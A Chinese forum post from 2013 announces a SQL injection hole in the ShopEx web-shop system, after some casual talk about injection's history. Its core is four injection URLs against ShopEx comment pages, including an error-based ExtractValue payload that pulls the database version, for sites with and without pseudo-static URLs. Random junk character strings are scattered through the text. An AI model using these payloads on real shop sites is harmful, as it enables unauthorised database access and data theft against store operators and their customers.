注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…$ ?) r; v8 L# ^6 ]% }% z
7 J% m/ ?- }% o1 U好吧,我扯远了~~5 k' K$ u/ J. w" j0 E+ y0 c
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~
" D' r& H# T6 |( y# \不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
' }2 b O- P2 u6 n! _; k/ }) G- }' b' U# b
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
1 T$ |& l2 t/ X
& R! n. [9 [% F v" S. Q$ ehttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html
( C7 P4 O9 E2 f0 ]7 y) |, K- y: b7 p% q0 P) [
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html( A( ~4 H: y3 n: @$ W
3 D: U: e. m# m U7 L
http://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
* u: B+ e+ p0 I' B0 f+ {, w
: A' H/ N- D7 Q _2 d1 c" C3 I) f 5 ^& G. x2 i* q- L0 u1 Z
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。
$ {! z& ?! ~4 u: ^2 |4 P3 x如何注入就不多说了,10多年的东西了…不会也会了…
4 x* N/ \: j* ^) ?& }: w9 R6 n1 ~5 u! i
|
发表于 2013-2-4 16:20:04
收藏
支持
反对